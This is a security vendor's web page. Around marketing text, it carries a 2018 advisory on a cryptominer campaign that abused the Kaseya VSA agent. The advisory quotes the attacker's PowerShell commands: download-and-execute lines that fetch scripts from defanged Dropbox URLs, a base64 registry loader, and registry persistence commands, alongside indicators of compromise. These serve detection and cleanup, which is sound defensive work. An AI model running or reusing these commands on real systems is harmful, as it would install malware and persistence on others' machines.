Combine cutting-edge XDR technology, multi-signal threat intelligence and 24/7 Elite Threat Hunters to help you build a world-class security operation.
Our team delivers the fastest response time in the industry. Threat suppression within just 4 hours of being engaged.
Cyber risk and advisory programs that identify security gaps and build security strategies to address them.
24/7 SOC-as-a-Service with unlimited threat hunting and incident handling.
XDR with machine learning that eliminates noise, enables real-time detection and response, and automatically blocks threats.
Seamless integration and threat investigation across your existing tech stack.
Proactive threat intelligence, original threat research and a world-class team of seasoned industry veterans.
Extend your team capabilities and prevent business disruption with expertise from eSentire.
We balance automated blocks with rapid human-led investigations to manage threats.
Guard endpoints by isolating and remediating threats to prevent lateral spread.
Defend brute force attacks, active intrusions and unauthorized scans.
Investigation and threat detection across multi-cloud or hybrid environments.
Remediate misconfigurations, vulnerabilities and policy violations.
Investigate and respond to compromised identities and insider threats.
Stop ransomware before it spreads.
Meet regulatory compliance mandates.
Detect and respond to zero-day exploits.
End misconfigurations and policy violations.
Defend third-party and supply chain risk.
Prevent disruption by outsourcing MDR.
Adopt a risk-based security approach.
Meet insurability requirements with MDR.
Protect your most sensitive data.
Build a proven security program.
Operationalize timely, accurate, and actionable cyber threat intelligence.
THE THREAT On November 18th, 2024, Palo Alto disclosed a critical actively exploited authentication bypass zero-day vulnerability impacting Palo Alto Networks PAN-OS. The…
Nov 13, 2024THE THREAT Update: eSentire has observed multiple exploitation attempts targeting CVE-2024-8069. In real-world attacks, threat actors successfully achieved RCE and attempted to…
eSentire is The Authority in Managed Detection and Response Services, protecting the critical data and applications of 2000+ organizations in 80+ countries from known and unknown cyber threats. Founded in 2001, the company’s mission is to hunt, investigate and stop cyber threats before they become business disrupting events.
We provide sophisticated cybersecurity solutions for Managed Security Service Providers (MSSPs), Managed Service Providers (MSPs), and Value-Added Resellers (VARs). Find out why you should partner with eSentire, the Authority in Managed Detection and Response, today.
Multi-Signal MDR with 300+ technology integrations to support your existing investments.
24/7 SOC-as-a-Service with unlimited threat hunting and incident handling.
Three MDR package tiers are available based on per-user pricing and level of risk tolerance.
The latest security advisories, blogs, reports, industry publications and webinars published by TRU.
Compare eSentire to other Managed Detection and Response vendors to see how we stack up against the competition.
See why 2000+ organizations globally have chosen eSentire for their MDR Solution.
Originally published on 2018-01-29
eSentire has observed an unknown threat actor attempting to deploy a Monero cryptocurrency miner to multiple eSentire customers. We assess with high confidence that the threat leveraged Kaseya Ltd’s Virtual Systems Administrator (VSA) agent to gain unauthorized access to multiple customer assets since January 19, 2018.
Although we have no direct information pertaining to the root cause of the observed incidents, customers who utilize Kaseya VSA are encouraged to review the below action items and contact their managed service provider.
eSentire has disclosed this issue to Kaseya, who is actively working to communicate and mitigate the issue.
Kaseya has made a set of patches available to address this vulnerability and has provided procedures to detect and remove the Monero cryptocurrency miner software from affected endpoints. We recommend applying the vendor patches as soon as possible. Details are available from Kaseya at: https://helpdesk.kaseya.com/hc/en-gb/articles/360000333152
The technical Indicators of Compromise included in this advisory can be used by affected organizations to facilitate detection of the observed malicious activities. It is possible this exploit could mutate, requiring new Indicators of Compromise. eSentire will update this advisory as new information becomes available.
Between January 19th and 24th 2018, eSentire SOC observed suspicious PowerShell activity across several customers running esENDPOINT.
A summary of this activity is as follows:
powershell "" -command "$client = new-object System.Net.WebClient;iex $client.DownloadString('hxxps://dl[.]dropboxusercontent[.]com/s/vtzu1wyvem5n5je/reg_load.ps1')" ""
The result of this activity is the deployment of Monero mining software xmrig.exe on victim assets. This activity was traced back to Kaseya’s VSA agent (agentmon.exe) and impacted customers were notified.
Customers who actively use Kaseya VSA are encouraged to examine systems for the indicators of compromise included in this advisory. Impacted systems can be remediated by removing registry keys and scheduled tasks, and by stopping the PowerShell process running xmrig.exe.
Binary:
Domain:
Scheduled Tasks:
Two scheduled tasks are created using schtasks.exe, one with a randomly generated name with a static creation date, the other with a static task name.
-version 2 -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp "HKLM:\SOFTWARE\Microsoft\Powershell").ScriptInit)));
-version 2 -executionpolicy bypass -command "$client = new-object System.Net.WebClient;iex $client.DownloadString('hxxps://dl[.]dropboxusercontent[.]com/s/namkbc37wtx2mdq/reg_load_subsequent.ps1')"
IP Addresses (contacted by xmrig.exe):
149.56.23.158
104.223.89.251
104.144.207.217
138.128.5.66
Registry Keys
HKLM\SOFTWARE\Microsoft\PowerShell\Scripts\a
HKLM\SOFTWARE\Microsoft\PowerShell\Scripts\b
HKLM\SOFTWARE\Microsoft\PowerShell\Scripts\c
HKLM\SOFTWARE\Microsoft\PowerShell\Scripts\d
HKLM\SOFTWARE\Microsoft\Powershell\Scripts\Scriptinit
URLs:
hxxps://dl[.]dropboxusercontent[.]com/s/vtzu1wyvem5n5je/reg_load.ps1
hxxps://dl[.]dropboxusercontent[.]com/s/namkbc37wtx2mdq/reg_load_subsequent.ps1
hxxps://dl[.]dropboxusercontent[.]com/s/nz6mq7jwnf8gmhq/first_script.txt
hxxps://dl[.]dropboxusercontent[.]com/s/4bilrgxthnl4iur/a_32.txt
hxxps://dl[.]dropboxusercontent[.]com/s/ounrhkotrpfkjrh/b_32.txt
hxxps://dl[.]dropboxusercontent[.]com/s/xuwfqqz8l8h88q2/c_32.txt
hxxps://dl[.]dropboxusercontent[.]com/s/1iflfmz5ekeots1/d_32.txt
hxxps://dl[.]dropboxusercontent[.]com/s/yf63eyof45kqaku/a.txt
hxxps://dl[.]dropboxusercontent[.]com/s/x3nxssuzsra54ci/b.txt
hxxps://dl[.]dropboxusercontent[.]com/s/2hcowopx4qd1qph/c.txt
hxxps://dl[.]dropboxusercontent[.]com/s/1b19mrmsyyu50y4/d.txt
hxxps://dl[.]dropboxusercontent[.]com/s/1up2snqmilrhq9b/Initialize%20Powershell%20Libraries.xml
hxxps://dl[.]dropboxusercontent[.]com/s/lywgcz9vukr5323/CacheTask.xml
Yesterday evening, Dropbox hosted PowerShell scripts pertaining to this threat were updated with new registry keys and scheduled tasks.
This was noted by Huntress Labs (https://twitter.com/HuntressLabs/status/958262755638657024) and confirmed by eSentire.
We recommend following up with your MSP to ensure that the latest version of Kaseya’s cleanup scripts has been deployed (Kaseya has updated the script with checks for the new keys and scheduled task https://helpdesk.kaseya.com/hc/en-gb/articles/360000346651?mobile_site=true ).
The first change is to the registry keys where the encoded binary parts and initiator script are stored:
Original:
Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Powershell\Scripts -Name a -Value $a
Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Powershell\Scripts -Name b -Value $b
Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Powershell\Scripts -Name c -Value $c
Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Powershell\Scripts -Name d -Value $d
Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Powershell -Name ScriptInit -Value $firstScript
New (2018-01-29):
Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Policies\System -Name a -Value $a
Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Policies\System -Name b -Value $b
Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Policies\System -Name c -Value $c
Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Policies\System -Name d -Value $d
Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Policies -Name Start -Value $firstScript
The second change is an edit to scheduled task “\Microsoft\Windows\WindowsUpdate\sihboot”, which executes PowerShell and redeploys the initiator script and binary.
eSentire has observed several changes in infrastructure and persistence techniques since 2018-01-30. The infrastructure used to host deployment scripts and binaries has moved away from Dropbox to various VPS hosts. eSentire has blocked access to the new infrastructure across our customers, but are not publicly sharing these indicators at this time.
Registry keys holding encoded xmrig binary parts and the initiator script has changed to the following locations:
HKLM:\SOFTWARE\Microsoft\Tcpip\x
HKLM:\SOFTWARE\Microsoft\Tcpip\d
HKLM:\SOFTWARE\Microsoft\Tcpip\c
HKLM:\SOFTWARE\Microsoft\Tcpip\b
HKLM:\SOFTWARE\Microsoft\Tcpip\a
Reg_load.ps1 uses Windows Task Scheduler (schtasks.exe) to read from file SynchronizeTimeZone.xml to deploy task name “\Microsoft\Windows\Time Zone\SynchronizeTimeZone”.
A new variant of xmrig.exe (compiled 2018-02-05) was also observed as md5:ed89e756ad2ed4bdb8b075e62ddf9fea/name:chrome.exe. This file was first submitted to VirusTotal at 2018-02-14 02:39:59.
Additionally, the following registry keys were observed after 2018-02-02, but may no longer be used:
HKLM:\SOFTWARE\Microsoft\RemovalTools\x
HKLM:\SOFTWARE\Microsoft\RemovalTools\d
HKLM:\SOFTWARE\Microsoft\RemovalTools\c
HKLM:\SOFTWARE\Microsoft\RemovalTools\b
HKLM:\SOFTWARE\Microsoft\RemovalTools\a